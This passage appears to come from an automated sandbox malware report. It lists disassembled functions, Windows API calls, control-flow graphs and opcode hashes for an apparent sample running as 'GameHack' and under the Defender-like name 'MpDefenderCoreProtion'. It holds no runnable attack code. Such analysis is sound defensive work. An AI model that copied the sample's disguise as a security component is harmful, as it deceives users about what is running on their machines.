                                      • Instruction ID: ccd8578af99810c36fd277c5f635f38a09a36557c5a0c1bf5cdc9e59041339bd
                                      • Opcode Fuzzy Hash: e016e7b548cbc263591c8f8f4462471ce57affa7ec82735becce4a46d07a040e
                                      • Instruction Fuzzy Hash: 97D05B7150902126CA102724AC0ADAF7B09DF51734F500716F639752F5DF610A9265D5
                                      Function 00EDDA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00EDD32F,?), ref: 00EDDA53
                                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00EDD32F,?), ref: 00EDDA61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: FindHandleModuleResource
                                      • String ID: RTL
                                      • API String ID: 3537982541-834975271
                                      • Opcode ID: db73d924d1987faad825959dea99e70c3e54845cfabac72dbdf63bca17ba68fd
                                      • Instruction ID: 7b12b8c086ad6d529ae8180949f0cae8ad13c6d2e4ff26835babf26a56f15f6f
                                      • Opcode Fuzzy Hash: db73d924d1987faad825959dea99e70c3e54845cfabac72dbdf63bca17ba68fd
                                      • Instruction Fuzzy Hash: C8C0123128A75076D73017216D0DB433A4C6B10B15F05044DB185DA1D0D5E5C9459650

                                      Execution Graph

                                      Execution Coverage:6.3%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:30
                                      Total number of Limit Nodes:5
                                      execution_graph 21385 17d5f8c 21387 17d5f17 21385->21387 21386 17d5f9a 21387->21386 21390 17db718 21387->21390 21388 17d5fbe 21391 17db73d 21390->21391 21395 17db828 21391->21395 21399 17db818 21391->21399 21392 17db747 21392->21388 21396 17db84f 21395->21396 21398 17db92c 21396->21398 21403 17d7894 21396->21403 21400 17db84f 21399->21400 21401 17db92c 21400->21401 21402 17d7894 CreateActCtxA 21400->21402 21401->21401 21402->21401 21404 17dc8b8 CreateActCtxA 21403->21404 21406 17dc97b 21404->21406 21406->21406 21407 17de657 21408 17de60b DuplicateHandle 21407->21408 21410 17de667 21407->21410 21409 17de62e 21408->21409 21411 17de350 21412 17de396 GetCurrentProcess 21411->21412 21414 17de3e8 GetCurrentThread 21412->21414 21415 17de3e1 21412->21415 21416 17de41e 21414->21416 21417 17de425 GetCurrentProcess 21414->21417 21415->21414 21416->21417 21420 17de45b 21417->21420 21418 17de483 GetCurrentThreadId 21419 17de4b4 21418->21419 21420->21418

                                      Executed Functions

                                      Function 017DE340 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1431 17de340-17de3df GetCurrentProcess 1436 17de3e8-17de41c GetCurrentThread 1431->1436 1437 17de3e1-17de3e7 1431->1437 1438 17de41e-17de424 1436->1438 1439 17de425-17de459 GetCurrentProcess 1436->1439 1437->1436 1438->1439 1440 17de45b-17de461 1439->1440 1441 17de462-17de47d call 17de521 1439->1441 1440->1441 1445 17de483-17de4b2 GetCurrentThreadId 1441->1445 1446 17de4bb-17de51d 1445->1446 1447 17de4b4-17de4ba 1445->1447 1447->1446
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 017DE3CE
                                      • GetCurrentThread.KERNEL32 ref: 017DE40B
                                      • GetCurrentProcess.KERNEL32 ref: 017DE448
                                      • GetCurrentThreadId.KERNEL32 ref: 017DE4A1
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.1335923594.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_17d0000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: bde9dd0fa4ea6fe8c9ef9576fcab3ce2a4ddc677653b808bd4df672164efe691
                                      • Instruction ID: f77b1293f9fa12952719f6044ca771257314ddb2cf023e7dc31c302926bdde85
                                      • Opcode Fuzzy Hash: bde9dd0fa4ea6fe8c9ef9576fcab3ce2a4ddc677653b808bd4df672164efe691
                                      • Instruction Fuzzy Hash: 685166B09007098FDB14DFAAD949BAEFBF1EB88314F208029E418A7390DB355945CF66
                                      Function 017DE350 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1454 17de350-17de3df GetCurrentProcess 1458 17de3e8-17de41c GetCurrentThread 1454->1458 1459 17de3e1-17de3e7 1454->1459 1460 17de41e-17de424 1458->1460 1461 17de425-17de459 GetCurrentProcess 1458->1461 1459->1458 1460->1461 1462 17de45b-17de461 1461->1462 1463 17de462-17de47d call 17de521 1461->1463 1462->1463 1467 17de483-17de4b2 GetCurrentThreadId 1463->1467 1468 17de4bb-17de51d 1467->1468 1469 17de4b4-17de4ba 1467->1469 1469->1468
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 017DE3CE
                                      • GetCurrentThread.KERNEL32 ref: 017DE40B
                                      • GetCurrentProcess.KERNEL32 ref: 017DE448
                                      • GetCurrentThreadId.KERNEL32 ref: 017DE4A1
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.1335923594.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_17d0000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: 5829f4c41348112df121dfcdb66961978241e44bd6fd02e96cd9f861c3be5049
                                      • Instruction ID: 7060894a78867cb3b30a0a8b68c9d2b981b317bcfabb3acda63aa2e6eda325b4
                                      • Opcode Fuzzy Hash: 5829f4c41348112df121dfcdb66961978241e44bd6fd02e96cd9f861c3be5049
                                      • Instruction Fuzzy Hash: E15156B09007498FDB14DFAAD549B9EFFF1EB88314F208029E418A7390DB755845CF65
                                      Function 017DC8AC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2232 17dc8ac-17dc979 CreateActCtxA 2234 17dc97b-17dc981 2232->2234 2235 17dc982-17dc9dc 2232->2235 2234->2235 2242 17dc9de-17dc9e1 2235->2242 2243 17dc9eb-17dc9ef 2235->2243 2242->2243 2244 17dc9f1-17dc9fd 2243->2244 2245 17dca00 2243->2245 2244->2245 2246 17dca01 2245->2246 2246->2246
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 017DC969
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.1335923594.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_17d0000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 52db519163458ac1cc2709a212e3fff0964965c46cf9ccf4efd3fe94fadd3fe1
                                      • Instruction ID: 2fbae4e4c41469d9ad598f64e05e0e60dfff69e806d8fccf96bd3b993275ac22
                                      • Opcode Fuzzy Hash: 52db519163458ac1cc2709a212e3fff0964965c46cf9ccf4efd3fe94fadd3fe1
                                      • Instruction Fuzzy Hash: F741FEB5C0071DCBEB29DFAAC944B9DFBB1BF48304F20816AD408AB255DB756946CF50
                                      Function 017D7894 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2248 17d7894-17dc979 CreateActCtxA 2251 17dc97b-17dc981 2248->2251 2252 17dc982-17dc9dc 2248->2252 2251->2252 2259 17dc9de-17dc9e1 2252->2259 2260 17dc9eb-17dc9ef 2252->2260 2259->2260 2261 17dc9f1-17dc9fd 2260->2261 2262 17dca00 2260->2262 2261->2262 2263 17dca01 2262->2263 2263->2263
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 017DC969
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.1335923594.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_17d0000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 873c876d300eb2147968a7b466a610c46a454afd27173751a53e3f00a91a56bc
                                      • Instruction ID: e7f0696922690b7dbc27c2762b4a39c3b93b96296a3fcc3561de966f4fd9aff8
                                      • Opcode Fuzzy Hash: 873c876d300eb2147968a7b466a610c46a454afd27173751a53e3f00a91a56bc
                                      • Instruction Fuzzy Hash: 1241E3B1C0071DCBEB25DFAAC844B9DFBB5BF48304F20816AD508AB255DB756946CF90
                                      Function 017DE657 Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2265 17de657-17de665 2266 17de60b-17de62c DuplicateHandle 2265->2266 2267 17de667-17de786 2265->2267 2268 17de62e-17de634 2266->2268 2269 17de635-17de652 2266->2269 2268->2269
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017DE61F
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.1335923594.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_17d0000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 4d821c4b9d776fbcbb8654a58f55a8ff02a3739d4efa8008099cbf9dc5107a54
                                      • Instruction ID: 85593bbad2850b8ef77d2f24845292a4aedd84fb22df77182b214bc3748ec382
                                      • Opcode Fuzzy Hash: 4d821c4b9d776fbcbb8654a58f55a8ff02a3739d4efa8008099cbf9dc5107a54
                                      • Instruction Fuzzy Hash: 34314BB9A613809FE7118FA5E94676D3FB2F788300F10402AF9058B3C1DB795942CF54
                                      Function 017DE590 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                      Download Yara Rule
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017DE61F
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.1335923594.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_17d0000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: a57a3d3ad39debd486cf5f5f12b17108370974516f2d024c8c83ac8033c9cebb
                                      • Instruction ID: c21a2e72e9cfa8b3211e638562f680505aec80e3d0ab13b358029f19da341736
                                      • Opcode Fuzzy Hash: a57a3d3ad39debd486cf5f5f12b17108370974516f2d024c8c83ac8033c9cebb
                                      • Instruction Fuzzy Hash: 5D2114B5C002099FDB10CFAAD885ADEFBF8FB48320F14801AE918A3310D378A941CF65
                                      Function 017DE598 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017DE61F
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.1335923594.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_17d0000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 7053d86e764bb79ae992d1de1cebc726df6951ac5b4c89385b1bfc870123b378
                                      • Instruction ID: 172a1cf58cef2e5fe526a8cd37c229b7d77424624595a1bdf4d902c23831a677
                                      • Opcode Fuzzy Hash: 7053d86e764bb79ae992d1de1cebc726df6951ac5b4c89385b1bfc870123b378
                                      • Instruction Fuzzy Hash: E121E4B5D002099FDB10CF9AD884ADEFBF8EB48320F14801AE914A7350D778A940CF65

                                      Executed Functions

                                      Function 015787F0 Relevance: 2.4, Strings: 1, Instructions: 1157COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q
                                      • API String ID: 0-1807707664
                                      • Opcode ID: 685b60f2c62ecc6b2f1d0626696587932335d60f3847f9f83a08f00f8febaeb9
                                      • Instruction ID: e7c182af7d88c32530725671c26b9769bc87435fb92a348f3124a3a2cee5cb77
                                      • Opcode Fuzzy Hash: 685b60f2c62ecc6b2f1d0626696587932335d60f3847f9f83a08f00f8febaeb9
                                      • Instruction Fuzzy Hash: 04A228747006118FDB29DF38E499A6EBBF2BF88314F1449A9E516CB361DB31E844CB61
                                      Function 01575E98 Relevance: 2.7, Strings: 2, Instructions: 244COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: dq$tPq
                                      • API String ID: 0-2605541315
                                      • Opcode ID: 7155cd7561e0af695c4a0962d5309891c7f38b547764f4c7679a95ce2c45e078
                                      • Instruction ID: 5e389046f82b3233dd32b77f3a48aff16298bb5c80c25c57518ff7e5768120f1
                                      • Opcode Fuzzy Hash: 7155cd7561e0af695c4a0962d5309891c7f38b547764f4c7679a95ce2c45e078
                                      • Instruction Fuzzy Hash: E4916E34B102158FEB19AB75E41976D7BB6FB88305F10846DE806EB390EF359C86CB61
                                      Function 01575E88 Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: dq$tPq
                                      • API String ID: 0-2605541315
                                      • Opcode ID: 606255d529325e9ba56a6ab9d013bae19f4f74c2d5aa05aded6a37b958df79df
                                      • Instruction ID: 4b05249b6ee215e0a04602ae4f44c7447db933fe5b47302553ca197d327b830c
                                      • Opcode Fuzzy Hash: 606255d529325e9ba56a6ab9d013bae19f4f74c2d5aa05aded6a37b958df79df
                                      • Instruction Fuzzy Hash: E4918034B10314CFDB19AB79E41976D7AA6FB88305F14846DE806EB390EF359C868B61
                                      Function 0157AACF Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: C8
                                      • API String ID: 0-392638660
                                      • Opcode ID: 07142b7cc74a93b5aeb21bf1c779c1564af3a60341b9489bca5ec5af487e0e4a
                                      • Instruction ID: 446d6de50fecd46d4d722ab564200ce3f049189ac7a5b8fa5d1a31e32c08f3ec
                                      • Opcode Fuzzy Hash: 07142b7cc74a93b5aeb21bf1c779c1564af3a60341b9489bca5ec5af487e0e4a
                                      • Instruction Fuzzy Hash: C741AE347002009FCB15DB6CE855A2EBBE6EFC82107148569E90ADF761EA30EC028B91
                                      Function 01576C68 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Teq
                                      • API String ID: 0-1098410595
                                      • Opcode ID: e2f667edc8337ffab70928d87c68d9b163ca29d08c161128d95e9cd0ff816d72
                                      • Instruction ID: 7a7ed8f491a589bfe7c5c202e7acf9177a5a0910583bec64d01d14a0455562b4
                                      • Opcode Fuzzy Hash: e2f667edc8337ffab70928d87c68d9b163ca29d08c161128d95e9cd0ff816d72
                                      • Instruction Fuzzy Hash: 1F417A70B006149FDB14DF6ED555B9EBBF6BF89710F24806AE406EB3A4CE719C018B90
                                      Function 015710A2 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Teq
                                      • API String ID: 0-1098410595
                                      • Opcode ID: 7c66bcfb3f506e4cf6715c96340a139dcaef1a0276c5d96f23be867471a5a392
                                      • Instruction ID: 04d52b7a3c01cca000c1981052007170e4745a7febcf84652b2add0747b2a624
                                      • Opcode Fuzzy Hash: 7c66bcfb3f506e4cf6715c96340a139dcaef1a0276c5d96f23be867471a5a392
                                      • Instruction Fuzzy Hash: C2218E31B402158FDB14DB69E859BAEBBF6BF88710F24005AE501EF3A0CF759D018B91
                                      Function 0157A550 Relevance: .5, Instructions: 497COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 636736b84588446cd863fb49ffe1dd2e252a2c8bfc03013449e8be8cdfc891ad
                                      • Instruction ID: 04ba6c1f10a9ec8daf4da9eac5e25cdc9782203be99f26111c460b8681927a67
                                      • Opcode Fuzzy Hash: 636736b84588446cd863fb49ffe1dd2e252a2c8bfc03013449e8be8cdfc891ad
                                      • Instruction Fuzzy Hash: 3B02AC747047018FCB15DB3CE495A2E7BE6BF89604B1948A9E946CF362DB34EC46C7A0
                                      Function 015792DA Relevance: .2, Instructions: 150COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c037d0246db7847746f09a7b5a6694f08b226086396fa987f1fde3b28598860c
                                      • Instruction ID: 68086172e336e94af29408e58325ca5c9d473d9c546612b6e6b047ee4ef7f193
                                      • Opcode Fuzzy Hash: c037d0246db7847746f09a7b5a6694f08b226086396fa987f1fde3b28598860c
                                      • Instruction Fuzzy Hash: 7351A0707047408FCB25CF38E495A6EBBF6BF85229B044899E556CF3A2DB31E845CB61
                                      Function 01579BE7 Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d93a785634c2732341c23ea0982b54637d6b5d9b99d0db6f51c94b7fadbf4f70
                                      • Instruction ID: 8f8b8c5202baf1af14a33c6ba31238502e9d0d7445d5de49966fb5f54e9cdc43
                                      • Opcode Fuzzy Hash: d93a785634c2732341c23ea0982b54637d6b5d9b99d0db6f51c94b7fadbf4f70
                                      • Instruction Fuzzy Hash: C451E675300B018FCB29DF39E49996EB7F6BF89218B5109A9E506CB361DB31EC45CB60
                                      Function 01570E9A Relevance: .1, Instructions: 85COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf31b01319b106320a340ee9ca1ccd396d7de91614c56248765d89200962b9b4
                                      • Instruction ID: 35c3d01c64ade9b3cde53b557f9d5a5336ddcf0b8b7f4771653048d50bc2c0e9
                                      • Opcode Fuzzy Hash: bf31b01319b106320a340ee9ca1ccd396d7de91614c56248765d89200962b9b4
                                      • Instruction Fuzzy Hash: B7317E71A00209DFDB18CF68E449BADBBF2FF49310F208569F415AB2A1DB75A945CB40
                                      Function 0157AC2D Relevance: .1, Instructions: 78COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6150c037a22b017b682b951e046aa3200409511868c64794b8dfa25637cec175
                                      • Instruction ID: f45165acde428eabb7a4ea0d3ee11523a667c9091871cb155c95046ec0016f82
                                      • Opcode Fuzzy Hash: 6150c037a22b017b682b951e046aa3200409511868c64794b8dfa25637cec175
                                      • Instruction Fuzzy Hash: E71193357043008FCB06DB6CE845E7D7BF6EF8962075945A6F54ACB772DA21DC0287A0
                                      Function 01576A28 Relevance: .1, Instructions: 74COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e9902ac8f51c4c500b659520592c6f7dd07d5c36590fe4cdcbe39a0fbd4d2918
                                      • Instruction ID: 69d47e1a606956bf827792b2565e3920cd7c6a018d3d5c465aa45c80d1a32245
                                      • Opcode Fuzzy Hash: e9902ac8f51c4c500b659520592c6f7dd07d5c36590fe4cdcbe39a0fbd4d2918
                                      • Instruction Fuzzy Hash: E0311A70E01209DFDB04EFA9E495AEEBBF2FF49304F204429E415BB250DB75A905CB91
                                      Function 01576A38 Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ccf5171eb392199705e62ffd84912b12afbc577d21a5250626e0c07d200949ad
                                      • Instruction ID: 0eb3f82e8179db5fa019503bae2d3464b54ef4ceaed86c9e4e67679564696e3c
                                      • Opcode Fuzzy Hash: ccf5171eb392199705e62ffd84912b12afbc577d21a5250626e0c07d200949ad
                                      • Instruction Fuzzy Hash: 21310770E01209DFDB04EFA9E485AEEBBB2FF49300F208429E415AB250DB75AD05CB61
                                      Function 01570D40 Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7925e3f0f8cae3ac453d9cc12449f1bcf94b12b7f5dd028fa4e47e162a2d4f01
                                      • Instruction ID: 2cd50118181f023a3431cc2e78b369c07055ccabb6c4745f385ea39e49d58caf
                                      • Opcode Fuzzy Hash: 7925e3f0f8cae3ac453d9cc12449f1bcf94b12b7f5dd028fa4e47e162a2d4f01
                                      • Instruction Fuzzy Hash: 2501F5777443194BD312563DB84165E7BDAE7C6765F28013AFA0ACB385CE66EC428390
                                      Function 01578740 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a762163a6d027ed2c23719077667d8fd71673b0cdc60b75284f7783dc080cf71
                                      • Instruction ID: 14d59955372149ba9b0f3b6fa64e890f7f7f281d38b91f471a9e43fa3800d953
                                      • Opcode Fuzzy Hash: a762163a6d027ed2c23719077667d8fd71673b0cdc60b75284f7783dc080cf71
                                      • Instruction Fuzzy Hash: 120117352146008FC314CF29D889D66BBF6FF89721B550999E546CB762CB32EC05CB20
                                      Function 0157AA18 Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4e06e504c404327ddf1e17aee837cea1788c1de3ee57b58e7c1021bd546cb561
                                      • Instruction ID: dda1d064b958061f406e73c421ede2aae84b00588a16b526e990d7ef7712b4a4
                                      • Opcode Fuzzy Hash: 4e06e504c404327ddf1e17aee837cea1788c1de3ee57b58e7c1021bd546cb561
                                      • Instruction Fuzzy Hash: 19F0F6313053018FDB14A52DA941B2FA3DAEBC8550718963EA50ACF745EE74EC0283A4
                                      Function 01571220 Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42ec99ea2fbbddd752fb261e53e0aef61f9a2446a8c7ecddabcacd01eea1652c
                                      • Instruction ID: 708b3fe0d0bd7a1ea0fe9c699877ebb50aaa6eb1ea2f34c09d49c31a9580a006
                                      • Opcode Fuzzy Hash: 42ec99ea2fbbddd752fb261e53e0aef61f9a2446a8c7ecddabcacd01eea1652c
                                      • Instruction Fuzzy Hash: ADF0C2757086504FD3014B3EA891A257BFAFFC662071981ABE515CF3B2C920CC058351
                                      Function 01571210 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2043943879.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_1570000_MpDefenderCoreProtion.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 118318f7b933497407fbd0dc7c5b3009d75502ff0c7ae73446b7006ea95e6e86
                                      • Instruction ID: d7b2c2944215e48ed0d77aae74fd48f06b8bb0f8691b8ab6a15fcdbb8b672b83
